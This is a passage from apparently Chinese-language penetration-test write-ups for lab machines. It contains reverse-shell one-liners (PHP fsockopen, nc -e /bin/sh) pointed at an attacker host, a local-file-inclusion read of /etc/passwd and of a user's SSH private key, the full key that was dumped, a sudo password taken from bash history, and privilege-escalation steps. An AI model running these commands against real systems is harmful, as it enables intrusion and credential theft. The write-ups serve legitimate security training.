执行反弹shell 201 | ``` 202 | php -r '$sock=fsockopen("192.168.146.50",4444);exec("/bin/sh -i <&3 >&3 2>&3");' 203 | 204 | ``` 205 | 206 | ![Img](../FILES/Cute/img-20220725115522.png) 207 | ##### 拿到shell 208 | ### 提权 209 | #### 使用linpeas进行信息收集 210 | ``` 211 | www-data@cute:/tmp$ wget http://192.168.146.50/linpeas.sh 212 | wget http://192.168.146.50/linpeas.sh 213 | --2022-07-23 14:30:48-- http://192.168.146.50/linpeas.sh 214 | Connecting to 192.168.146.50:80... connected. 215 | HTTP request sent, awaiting response... 200 OK 216 | Length: 777005 (759K) [text/x-sh] 217 | Saving to: 'linpeas.sh' 218 | 219 | linpeas.sh 100%[===================>] 758.79K --.-KB/s in 0.02s 220 | 221 | 2022-07-23 14:30:48 (43.2 MB/s) - 'linpeas.sh' saved [777005/777005] 222 | 223 | ``` 224 | ##### 获取能够使用的漏洞信息 225 | ``` 226 | ╔══════════╣ CVEs Check 227 | Vulnerable to CVE-2021-4034 228 | 229 | ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d 230 | ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid 231 | Matching Defaults entries for www-data on cute: 232 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 233 | 234 | User www-data may run the following commands on cute: 235 | (root) NOPASSWD: /usr/sbin/hping3 --icmp 236 | (ALL) NOPASSWD: ALL 237 | 238 | ``` 239 | ##### 发现可以直接使用hping3执行sudo 240 | ``` 241 | www-data@cute:/tmp$ sudo /usr/sbin/hping3 242 | sudo /usr/sbin/hping3 243 | hping3> id 244 | id 245 | uid=0(root) gid=0(root) groups=0(root) 246 | hping3> whoami 247 | whoami 248 | root 249 | hping3> pwd 250 | pwd 251 | /tmp 252 | hping3> 253 | ``` 254 | ##### 使用nc反弹shell 255 | ``` 256 | hping3> nc -e /bin/sh 192.168.146.50 4445 257 | nc -e /bin/sh 192.168.146.50 4445 258 | ``` 259 | ##### 最终getshell 260 | ``` 261 | ┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75] 262 | └─$ nc -lvnp 4445 263 | listening on [any] 4445 ... 264 | connect to [192.168.146.50] from (UNKNOWN) [192.168.146.75] 57576 265 | id 266 | uid=0(root) gid=0(root) groups=0(root) 267 | /usr/bin/script -qc /bin/bash /dev/null 268 | root@cute:/tmp# cd /root 269 | cd /root 270 | root@cute:~# ls 271 | ls 272 | localweb root.txt 273 | root@cute:~# cat root.txtg 274 | cat root.txtg 275 | cat: root.txtg: No such file or directory 276 | root@cute:~# cat root.txt 277 | cat root.txt 278 | 0b18032c2d06d9e738ede9bc24795ff2 279 | root@cute:~# ip a 280 | ip a 281 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 282 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 283 | inet 127.0.0.1/8 scope host lo 284 | valid_lft forever preferred_lft forever 285 | inet6 ::1/128 scope host 286 | valid_lft forever preferred_lft forever 287 | 2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 288 | link/ether 00:0c:29:1b:b0:20 brd ff:ff:ff:ff:ff:ff 289 | inet 192.168.146.75/24 brd 192.168.146.255 scope global dynamic ens33 290 | valid_lft 70362sec preferred_lft 70362sec 291 | inet6 fe80::20c:29ff:fe1b:b020/64 scope link 292 | valid_lft forever preferred_lft forever 293 | root@cute:~# whoami 294 | whoami 295 | root 296 | root@cute:~# 297 | ``` 298 | ![Img](../FILES/Cute/img-20220725120352.png) 299 | 300 | 301 | 302 | -------------------------------------------------------------------------------- /Target Notes/FALL.md: -------------------------------------------------------------------------------- 1 | # 192.168.146.52 2 | ## 信息收集阶段 3 | ### NMAP 4 | ``` 5 | └─$ sudo nmap -A -sV -T4 -p- 192.168.146.52 6 | Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-15 10:56 HKT 7 | Stats: 0:02:27 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan 8 | NSE Timing: About 99.58% done; ETC: 10:58 (0:00:00 remaining) 9 | Nmap scan report for 192.168.146.52 10 | Host is up (0.00021s latency). 11 | Not shown: 65522 filtered ports 12 | PORT STATE SERVICE VERSION 13 | 22/tcp open ssh OpenSSH 7.8 (protocol 2.0) 14 | | ssh-hostkey: 15 | | 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA) 16 | | 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA) 17 | |_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519) 18 | 80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3) 19 | |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved. 20 | | http-robots.txt: 1 disallowed entry 21 | |_/ 22 | |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3 23 | |_http-title: Good Tech Inc's Fall Sales - Home 24 | 111/tcp closed rpcbind 25 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA) 26 | 443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3) 27 | |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved. 28 | | http-robots.txt: 1 disallowed entry 29 | |_/ 30 | |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3 31 | |_http-title: Good Tech Inc's Fall Sales - Home 32 | | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US 33 | | Subject Alternative Name: DNS:localhost.localdomain 34 | | Not valid before: 2019-08-15T03:51:33 35 | |_Not valid after: 2020-08-19T05:31:33 36 | |_ssl-date: TLS randomness does not represent time 37 | | tls-alpn: 38 | |_ http/1.1 39 | 445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA) 40 | 3306/tcp open mysql MySQL (unauthorized) 41 | 8000/tcp closed http-alt 42 | 8080/tcp closed http-proxy 43 | 8443/tcp closed https-alt 44 | 9090/tcp open http Cockpit web service 162 - 188 45 | |_http-title: Did not follow redirect to https://192.168.146.52:9090/ 46 | 10080/tcp closed amanda 47 | 10443/tcp closed cirrossp 48 | MAC Address: 00:0C:29:43:01:8A (VMware) 49 | Device type: general purpose 50 | Running: Linux 5.X 51 | OS CPE: cpe:/o:linux:linux_kernel:5 52 | OS details: Linux 5.0 - 5.4 53 | Network Distance: 1 hop 54 | Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel 55 | 56 | Host script results: 57 | |_clock-skew: mean: 2h20m01s, deviation: 4h02m30s, median: 0s 58 | | smb-os-discovery: 59 | | OS: Windows 6.1 (Samba 4.8.10) 60 | | Computer name: fall 61 | | NetBIOS computer name: FALL\x00 62 | | Domain name: \x00 63 | | FQDN: fall 64 | |_ System time: 2022-07-14T19:58:48-07:00 65 | | smb-security-mode: 66 | | account_used: 67 | | authentication_level: user 68 | | challenge_response: supported 69 | |_ message_signing: disabled (dangerous, but default) 70 | | smb2-security-mode: 71 | | 2.02: 72 | |_ Message signing enabled but not required 73 | | smb2-time: 74 | | date: 2022-07-15T02:58:46 75 | |_ start_date: N/A 76 | 77 | TRACEROUTE 78 | HOP RTT ADDRESS 79 | 1 0.21 ms 192.168.146.52 80 | 81 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 82 | Nmap done: 1 IP address (1 host up) scanned in 174.40 seconds 83 | 84 | ``` 85 | ### DIRSEARCH 86 | ``` 87 | dirsearch -u https://192.168.146.52 88 | 89 | _|. _ _ _ _ _ _|_ v0.4.2 90 | (_||| _) (/_(_|| (_| ) 91 | 92 | Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 93 | 94 | Output File: /home/aacai/.dirsearch/reports/192.168.146.52/_22-07-15_11-10-57.txt 95 | 96 | Error Log: /home/aacai/.dirsearch/logs/errors-22-07-15_11-10-57.log 97 | 98 | Target: https://192.168.146.52/ 99 | 100 | [11:10:57] Starting: 101 | [11:10:58] 403 - 220B - /.fishsrv.pl 102 | [11:10:58] 403 - 220B - /.ht_wsr.txt 103 | [11:10:58] 403 - 223B - /.htaccess.bak1 104 | [11:10:58] 403 - 223B - /.htaccess.orig 105 | [11:10:58] 403 - 225B - /.htaccess.sample 106 | 107 | .... 108 | 复制到一个txt文件里面grep 200状态的路径出来 109 | 110 | └─$ cat 80_info.txt | grep "200" 111 | [11:11:03] 200 - 4KB - /admin/login.php 112 | [11:11:07] 200 - 2KB - /assets/ 113 | [11:11:09] 200 - 0B - /config.php 114 | [11:11:11] 200 - 24B - /doc/ 115 | [11:11:12] 200 - 80B - /error.html 116 | [11:11:12] 200 - 1KB - /favicon.ico 117 | [11:11:14] 200 - 8KB - /index.php 118 | [11:11:15] 200 - 24B - /lib/ 119 | [11:11:17] 200 - 3KB - /modules/ 120 | [11:11:19] 200 - 17B - /phpinfo.php 121 | [11:11:22] 200 - 79B - /robots.txt 122 | [11:11:26] 200 - 80B - /test.php 123 | [11:11:26] 200 - 1KB - /tmp/ 124 | [11:11:27] 200 - 0B - /uploads/ 125 | 126 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 127 | └─$ 128 | ``` 129 | ## Web枚举 130 | >拿到admin的后台目录 131 | 132 | ![Img](../FILES/FALL/img-20220715111910.png) 133 | >sql注入无果 134 | 135 | >assets里面的文件夹均没有文件 136 | 137 | ![Img](../FILES/FALL/img-20220715112000.png) 138 | 139 | >doc没有返回任何信息 140 | ![Img](../FILES/FALL/img-20220715112225.png) 141 | >只有注释带有一句DUMMY HTML File 142 | 143 | >phpinfo.php也同样没有返回信息 144 | robots.php返回File not Found 145 | 146 | >但是 147 | 访问test.php的时候 148 | 告诉我Missing GET parameter 149 | ![Img](../FILES/FALL/img-20220715112425.png) 150 | 那就试试ffuf 151 | 152 | >ffuf是一款web fuzzer的工具, 用起来就是一个字"快" 153 | 但是在kali当中没有默认安装 154 | 需要sudo apt install ffuf去安装 155 | 156 | ``` 157 | 在这个地方我使用的字典不是默认自带的, 需要下载 158 | 可以使用sudo apt install seclists 159 | 或者直接上github下载 160 | https://github.com/danielmiessler/SecLists 161 | 默认路径/usr/share/seclists 162 | 163 | ┌──(aacai㉿kali)-[/usr/share/wordlists/wfuzz] 164 | └─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u "https://192.168.146.52/test.php?FUZZ=/etc/passwd" -fs 80 1 ⨯ 165 | 166 | /'___\ /'___\ /'___\ 167 | /\ \__/ /\ \__/ __ __ /\ \__/ 168 | \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ 169 | \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ 170 | \ \_\ \ \_\ \ \____/ \ \_\ 171 | \/_/ \/_/ \/___/ \/_/ 172 | 173 | v1.5.0 Kali Exclusive <3 174 | ________________________________________________ 175 | 176 | :: Method : GET 177 | :: URL : https://192.168.146.52/test.php?FUZZ=/etc/passwd 178 | :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt 179 | :: Follow redirects : false 180 | :: Calibration : false 181 | :: Timeout : 10 182 | :: Threads : 40 183 | :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 184 | :: Filter : Response size: 80 185 | ________________________________________________ 186 | 187 | file [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 11ms] 188 | :: Progress: [4712/4712] :: Job [1/1] :: 3126 req/sec :: Duration: [0:00:02] :: Errors: 0 :: 189 | 190 | ``` 191 | >在这里就可以看到file是作为一个get参数的, 那就代表它有文件包含 192 | ``` 193 | https://192.168.146.52/test.php?file=/etc/passwd 194 | ``` 195 | ![Img](../FILES/FALL/img-20220715115848.png) 196 | >curl到本地 197 | ``` 198 | http://192.168.146.52/test.php?file=/etc/passwd 199 | ``` 200 | >试试看/root的.ssh key 201 | ``` 202 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 203 | └─$ curl http://192.168.146.52/test.php?file=/root/.ssh/id_rsa 204 | 205 | ``` 206 | >并没有回显, 从网页上获取一下信息 207 | ![Img](../FILES/FALL/img-20220715120726.png) 208 | 有一个posted by qiu, 这个用户可能是一个突破点 209 | ``` 210 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 211 | └─$ curl http://192.168.146.52/test.php?file=/home/qiu/.ssh/id_rsa 212 | -----BEGIN OPENSSH PRIVATE KEY----- 213 | b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn 214 | NhAAAAAwEAAQAAAQEAvNjhOFOSeDHy9K5vnHSs3qTjWNehAPzT0sD3beBPVvYKQJt0AkD0 215 | FDcWTSSF13NhbjCQm5fnzR8td4sjJMYiAl+vAKboHne0njGkBwdy5PgmcXyeZTECIGkggX 216 | 61kImUOIqtLMcjF5ti+09RGiWeSmfIDtTCjj/+uQlokUMtdc4NOv4XGJbp7GdEWBZevien 217 | qXoXtG6j7gUgtXX1Fxlx3FPhxE3lxw/AfZ9ib21JGlOyy8cflTlogrZPoICCXIV/kxGK0d 218 | Zucw8rGGMc6Jv7npeQS1IXU9VnP3LWlOGFU0j+IS5SiNksRfdQ4mCN9SYhAm9mAKcZW8wS 219 | vXuDjWOLEwAAA9AS5tRmEubUZgAAAAdzc2gtcnNhAAABAQC82OE4U5J4MfL0rm+cdKzepO 220 | NY16EA/NPSwPdt4E9W9gpAm3QCQPQUNxZNJIXXc2FuMJCbl+fNHy13iyMkxiICX68Apuge 221 | d7SeMaQHB3Lk+CZxfJ5lMQIgaSCBfrWQiZQ4iq0sxyMXm2L7T1EaJZ5KZ8gO1MKOP/65CW 222 | iRQy11zg06/hcYlunsZ0RYFl6+J6epehe0bqPuBSC1dfUXGXHcU+HETeXHD8B9n2JvbUka 223 | U7LLxx+VOWiCtk+ggIJchX+TEYrR1m5zDysYYxzom/uel5BLUhdT1Wc/ctaU4YVTSP4hLl 224 | KI2SxF91DiYI31JiECb2YApxlbzBK9e4ONY4sTAAAAAwEAAQAAAQArXIEaNdZD0vQ+Sm9G 225 | NWQcGzA4jgph96uLkNM/X2nYRdZEz2zrt45TtfJg9CnnNo8AhhYuI8sNxkLiWAhRwUy9zs 226 | qYE7rohAPs7ukC1CsFeBUbqcmU4pPibUERes6lyXFHKlBpH7BnEz6/BY9RuaGG5B2DikbB 227 | 8t/CDO79q7ccfTZs+gOVRX4PW641+cZxo5/gL3GcdJwDY4ggPwbU/m8sYsyN1NWJ8NH00d 228 | X8THaQAEXAO6TTzPMLgwJi+0kj1UTg+D+nONfh7xeXLseST0m1p+e9C/8rseZsSJSxoXKk 229 | CmDy69aModcpW+ZXl9NcjEwrMvJPLLKjhIUcIhNjf4ABAAAAgEr3ZKUuJquBNFPhEUgUic 230 | ivHoZH6U82VyEY2Bz24qevcVz2IcAXLBLIp+f1oiwYUVMIuWQDw6LSon8S72kk7VWiDrWz 231 | lHjRfpUwWdzdWSMY6PI7EpGVVs0qmRC/TTqOIH+FXA66cFx3X4uOCjkzT0/Es0uNyZ07qQ 232 | 58cGE8cKrLAAAAgQDlPajDRVfDWgOWJj+imXfpGsmo81UDaYXwklzw4VM2SfIHIAFZPaA0 233 | acm4/icKGPlnYWsvZCksvlUck+ti+J2RS2Mq9jmKB0AVZisFazj8qIde3SPPwtR7gBR329 234 | JW3Db+KISMRIvdpJv+eiKQLg/epbSdwXZi0DJoB0a15FsIAQAAAIEA0uQl0d0p3NxCyT/+ 235 | Q6N+llf9TB5+VNjinaGu4DY6qVrSHmhkceHtXxG6h9upRtKw5BvOlSbTatlfMZYUtlZ1mL 236 | RWCU8D7v1Qn7qMflx4bldYgV8lf18sb6g/uztWJuLpFe3Ue/MLgeJ+2TiAw9yYoPVySNK8 237 | uhSHa0dvveoJ8xMAAAAZcWl1QGxvY2FsaG9zdC5sb2NhbGRvbWFpbgEC 238 | -----END OPENSSH PRIVATE KEY----- 239 | 240 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 241 | └─$ 242 | ``` 243 | >得到qiu的ssh密钥 244 | ``` 245 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 246 | └─$ ls -al 247 | total 36 248 | drwxr-xr-x 2 aacai aacai 4096 Jul 15 12:11 . 249 | drwxr-xr-x 13 aacai aacai 4096 Jul 15 10:55 .. 250 | -rw-r--r-- 1 aacai aacai 3150 Jul 15 11:07 44567.txt 251 | -rw-r--r-- 1 aacai aacai 3446 Jul 15 11:13 49199.txt 252 | -rw-r--r-- 1 aacai aacai 1080 Jul 15 11:09 49345.txt 253 | -rw-r--r-- 1 aacai aacai 1070 Jul 15 11:03 49390.txt 254 | -rw-r--r-- 1 aacai aacai 3596 Jul 15 11:11 80_info.txt 255 | -rw-r--r-- 1 aacai aacai 1633 Jul 15 12:00 passwd.txt 256 | -rw-r--r-- 1 aacai aacai 1831 Jul 15 12:11 ssh_rsa 257 | 258 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 259 | └─$ 260 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 261 | └─$ ssh -i ssh_rsa qiu@192.168.146.52 262 | The authenticity of host '192.168.146.52 (192.168.146.52)' can't be established. 263 | ECDSA key fingerprint is SHA256:+P4Rs5s4ipya3/t+GBoy0WjQqL/LaExt9MFvWgld4xc. 264 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 265 | Warning: Permanently added '192.168.146.52' (ECDSA) to the list of known hosts. 266 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 267 | @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ 268 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 269 | Permissions 0644 for 'ssh_rsa' are too open. 270 | It is required that your private key files are NOT accessible by others. 271 | This private key will be ignored. 272 | Load key "ssh_rsa": bad permissions 273 | qiu@192.168.146.52: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). 274 | 275 | ``` 276 | >文件权限不对, 修改权限 277 | ``` 278 | └─$ sudo chmod 600 ssh_rsa 255 ⨯ 279 | [sudo] password for aacai: 280 | 281 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 282 | └─$ ls -al 283 | total 36 284 | drwxr-xr-x 2 aacai aacai 4096 Jul 15 12:11 . 285 | drwxr-xr-x 13 aacai aacai 4096 Jul 15 10:55 .. 286 | -rw-r--r-- 1 aacai aacai 3150 Jul 15 11:07 44567.txt 287 | -rw-r--r-- 1 aacai aacai 3446 Jul 15 11:13 49199.txt 288 | -rw-r--r-- 1 aacai aacai 1080 Jul 15 11:09 49345.txt 289 | -rw-r--r-- 1 aacai aacai 1070 Jul 15 11:03 49390.txt 290 | -rw-r--r-- 1 aacai aacai 3596 Jul 15 11:11 80_info.txt 291 | -rw-r--r-- 1 aacai aacai 1633 Jul 15 12:00 passwd.txt 292 | -rw------- 1 aacai aacai 1831 Jul 15 12:11 ssh_rsa 293 | 294 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 295 | └─$ 296 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 297 | └─$ ssh -i ssh_rsa qiu@192.168.146.52 298 | Web console: https://FALL:9090/ or https://192.168.146.52:9090/ 299 | 300 | Last login: Sun Sep 5 19:28:51 2021 301 | [qiu@FALL ~]$ 302 | 登录成功 303 | ``` 304 | ### 权限提升 305 | ``` 306 | [qiu@FALL ~]$ ls -a 307 | . .. .bash_history .bash_logout .bash_profile .bashrc local.txt reminder .ssh 308 | [qiu@FALL ~]$ cat .bash_history 309 | ls -al 310 | cat .bash_history 311 | rm .bash_history 312 | echo "remarkablyawesomE" | sudo -S dnf update 313 | ifconfig 314 | ping www.google.com 315 | ps -aux 316 | ps -ef | grep apache 317 | env 318 | env > env.txt 319 | rm env.txt 320 | lsof -i tcp:445 321 | lsof -i tcp:80 322 | ps -ef 323 | lsof -p 1930 324 | lsof -p 2160 325 | rm .bash_history 326 | exit 327 | ls -al 328 | cat .bash_history 329 | exit 330 | [qiu@FALL ~]$ id 331 | uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),10(wheel) 332 | [qiu@FALL ~]$ sudo -l 333 | [sudo] password for qiu: 334 | Matching Defaults entries for qiu on FALL: 335 | !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG 336 | LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME 337 | LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", 338 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 339 | 340 | User qiu may run the following commands on FALL: 341 | (ALL) ALL 342 | [qiu@FALL ~]$ 343 | 344 | ``` 345 | >...这个权限提升有点莫名的简单, 在.bash_profile里面就有自带的密码 346 | 并且sudo可以使用所有权限 347 | ``` 348 | [qiu@FALL ~]$ sudo su 349 | [root@FALL qiu]# id 350 | uid=0(root) gid=0(root) groups=0(root) 351 | [root@FALL qiu]# who ami 352 | [root@FALL qiu]# whoami 353 | root 354 | [root@FALL qiu]# ip a 355 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 356 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 357 | inet 127.0.0.1/8 scope host lo 358 | valid_lft forever preferred_lft forever 359 | inet6 ::1/128 scope host 360 | valid_lft forever preferred_lft forever 361 | 2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000 362 | link/ether 00:0c:29:43:01:8a brd ff:ff:ff:ff:ff:ff 363 | inet 192.168.146.52/24 brd 192.168.146.255 scope global dynamic noprefixroute ens33 364 | valid_lft 67037sec preferred_lft 67037sec 365 | inet6 fe80::af86:ce1d:cf2a:e830/64 scope link noprefixroute 366 | valid_lft forever preferred_lft forever 367 | [root@FALL qiu]# cd 368 | [root@FALL ~]# ls 369 | anaconda-ks.cfg original-ks.cfg proof.txt remarks.txt 370 | [root@FALL ~]# cat proof.txt 371 | Congrats on a root shell! :-) 372 | [root@FALL ~]# 373 | 374 | ``` 375 | -------------------------------------------------------------------------------- /Target Notes/Geisha.md: -------------------------------------------------------------------------------- 1 | # Geisha 2 | ## 信息收集 3 | ### 端口枚举 4 | 全端口扫描 5 | ``` 6 | └─$ sudo nmap -p- 192.168.146.66 7 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 14:40 HKT 8 | Nmap scan report for 192.168.146.66 9 | Host is up (0.00029s latency). 10 | Not shown: 65528 closed tcp ports (reset) 11 | PORT STATE SERVICE 12 | 21/tcp open ftp 13 | 22/tcp open ssh 14 | 80/tcp open http 15 | 7080/tcp open empowerid 16 | 7125/tcp open unknown 17 | 8088/tcp open radan-http 18 | 9198/tcp open unknown 19 | MAC Address: 00:0C:29:D6:81:2A (VMware) 20 | Nmap done: 1 IP address (1 host up) scanned in 7.97 seconds 21 | 22 | ``` 23 | 指定端口枚举 24 | ``` 25 | └─$ sudo nmap -p21,22,80,7080,7125,8088,9198 -sV -A 192.168.146.66 26 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 14:41 HKT 27 | Nmap scan report for 192.168.146.66 28 | Host is up (0.00034s latency). 29 | 30 | PORT STATE SERVICE VERSION 31 | 21/tcp open ftp vsftpd 3.0.3 32 | 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 33 | | ssh-hostkey: 34 | | 2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA) 35 | | 256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA) 36 | |_ 256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519) 37 | 80/tcp open http Apache httpd 2.4.38 ((Debian)) 38 | |_http-title: Geisha 39 | |_http-server-header: Apache/2.4.38 (Debian) 40 | 7080/tcp open ssl/http LiteSpeed httpd 41 | |_http-title: Geisha 42 | | ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US 43 | | Not valid before: 2020-05-09T14:01:34 44 | |_Not valid after: 2022-05-09T14:01:34 45 | |_http-server-header: LiteSpeed 46 | |_ssl-date: TLS randomness does not represent time 47 | | tls-alpn: 48 | | h2 49 | | spdy/3 50 | | spdy/2 51 | |_ http/1.1 52 | 7125/tcp open http nginx 1.17.10 53 | |_http-title: Geisha 54 | |_http-server-header: nginx/1.17.10 55 | 8088/tcp open http LiteSpeed httpd 56 | |_http-server-header: LiteSpeed 57 | |_http-title: Geisha 58 | 9198/tcp open http SimpleHTTPServer 0.6 (Python 2.7.16) 59 | |_http-title: Geisha 60 | MAC Address: 00:0C:29:D6:81:2A (VMware) 61 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 62 | Device type: general purpose 63 | Running: Linux 4.X|5.X 64 | OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 65 | OS details: Linux 4.15 - 5.6 66 | Network Distance: 1 hop 67 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 68 | 69 | TRACEROUTE 70 | HOP RTT ADDRESS 71 | 1 0.34 ms 192.168.146.66 72 | 73 | ``` 74 | ### FTP尝试登录 75 | 21端口无法匿名登录 76 |
77 | ![Img](../FILES/Geisha/img-20220814144430.png) 78 | 79 | ### 网页信息收集 80 | 80端口信息收集 81 | ``` 82 | ... 83 | [14:48:26] 200 - 176B - /index.html 84 | [14:48:26] 200 - 2B - /info.php 85 | ... 86 | ``` 87 |
88 | ![Img](../FILES/Geisha/img-20220814145223.png) 89 |
90 | 在info.php里面有一个1, 没有其他信息 91 |
92 | 93 | --- 94 | 7080端口 95 | ![Img](../FILES/Geisha/img-20220814145410.png) 96 | 跟80端口一样的图片 97 |
98 | 99 | ``` 100 | └─$ cat 7080_result.txt | grep -v "403" 101 | [14:54:24] Starting: 102 | [14:54:39] 301 - 1KB - /docs -> https://192.168.146.66:7080/docs/ 103 | [14:54:39] 200 - 6KB - /docs/ 104 | [14:54:43] 200 - 176B - /index.html 105 | 106 | ``` 107 | 108 | docs目录显示了当前server的版本 109 | ![Img](../FILES/Geisha/img-20220814145834.png) 110 | nikto没有任何结果 111 |
112 | dirb返回了js和img的目录 113 | ``` 114 | START_TIME: Sun Aug 14 15:11:58 2022 115 | URL_BASE: https://192.168.146.66:7080/ 116 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 117 | 118 | ----------------- 119 | 120 | GENERATED WORDS: 4612 121 | 122 | ---- Scanning URL: https://192.168.146.66:7080/ ---- 123 | ==> DIRECTORY: https://192.168.146.66:7080/docs/ 124 | + https://192.168.146.66:7080/index.html (CODE:200|SIZE:176) 125 | 126 | ---- Entering directory: https://192.168.146.66:7080/docs/ ---- 127 | ==> DIRECTORY: https://192.168.146.66:7080/docs/css/ 128 | ==> DIRECTORY: https://192.168.146.66:7080/docs/img/ 129 | + https://192.168.146.66:7080/docs/index.html (CODE:200|SIZE:5678) 130 | 131 | ---- Entering directory: https://192.168.146.66:7080/docs/css/ ---- 132 | 133 | ---- Entering directory: https://192.168.146.66:7080/docs/img/ ---- 134 | 135 | ----------------- 136 | END_TIME: Sun Aug 14 15:12:05 2022 137 | DOWNLOADED: 18448 - FOUND: 2 138 | 139 | ``` 140 | --- 141 | 7125端口 142 | ![Img](../FILES/Geisha/img-20220814151251.png) 143 | 一样的图片 144 |
145 | 目录枚举 146 | ``` 147 | ... 148 | [15:13:32] 200 - 175B - /index.php 149 | [15:13:33] 200 - 175B - /index.php/login/ 150 | [15:13:38] 200 - 1KB - /passwd 151 | ... 152 | ``` 153 | 发现登录目录以及passwd模块, 访问passwd模块之后则是直接下载了一个passwd文件下来 154 | ![Img](../FILES/Geisha/img-20220814151449.png) 155 | 但是并没有发现有哈希值的密码, 并且发现只有三个用户是可以登录的 156 |
157 | ![Img](../FILES/Geisha/img-20220814151809.png) 158 |
159 | ![Img](../FILES/Geisha/img-20220814151604.png) 160 | 访问login之后返回一个image, 但是没有内容 161 | 162 | --- 163 | 8088端口 164 | ``` 165 | Target: http://192.168.146.66:8088/ 166 | 167 | [15:20:01] Starting: 168 | [15:20:14] 301 - 1KB - /cgi-bin -> http://192.168.146.66:8088/cgi-bin/ 169 | [15:20:17] 301 - 1KB - /docs -> http://192.168.146.66:8088/docs/ 170 | [15:20:17] 200 - 6KB - /docs/ 171 | [15:20:20] 200 - 176B - /index.html 172 | [15:20:20] 200 - 2B - /info.php 173 | 174 | ``` 175 | 176 | cgi-bin下面只有一个helloword的页面 177 | ![Img](../FILES/Geisha/img-20220814152427.png) 178 | 179 | --- 180 | 9198端口信息收集 181 | ``` 182 | └─$ dirb "http://192.168.146.66:9198" 183 | 184 | ----------------- 185 | DIRB v2.22 186 | By The Dark Raver 187 | ----------------- 188 | 189 | START_TIME: Sun Aug 14 15:29:58 2022 190 | URL_BASE: http://192.168.146.66:9198/ 191 | 